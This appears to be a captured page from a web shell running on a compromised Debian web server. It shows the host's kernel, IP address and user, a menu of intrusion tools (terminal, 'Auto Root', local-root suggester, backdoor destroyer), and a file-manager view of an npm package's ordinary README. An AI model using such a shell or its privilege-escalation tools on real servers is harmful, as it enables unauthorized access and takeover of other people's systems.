Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
node_modules /
std-env /
Delete
Unzip
Name
Size
Permission
Date
Action
dist
[ DIR ]
drwxr-xr-x
2022-04-21 14:30
LICENCE
1.04
KB
-rw-r--r--
2022-04-21 14:27
README.md
979
B
-rw-r--r--
2022-04-21 14:27
package.json
609
B
-rw-r--r--
2022-04-21 14:27
Save
Rename
# std-env [](http://npmjs.com/package/std-env) [](http://npmjs.com/package/std-env) [](https://bundlephobia.com/result?p=std-env) > Detect current Javascript environment ## Installation ```sh # Using Yarn yarn add std-env # Using npm npm i std-env ``` ## Usage ```js // ESM import { isWindows } from 'std-env' // CommonJS const { isCI } = require('std-env') ``` Available exports: - `hasTTY` - `hasWindow` - `isCI` - `isDebug` - `isDevelopment` - `isLinux` - `isMacOS` - `isMinimal` - `isProduction` - `isTest` - `isWindows` - `platform` - `provider` You can read more about how each flag works from [./src/index.ts](./src/index.ts). List of well known providers can be found from [./src/providers.ts](./src/providers.ts). ## License MIT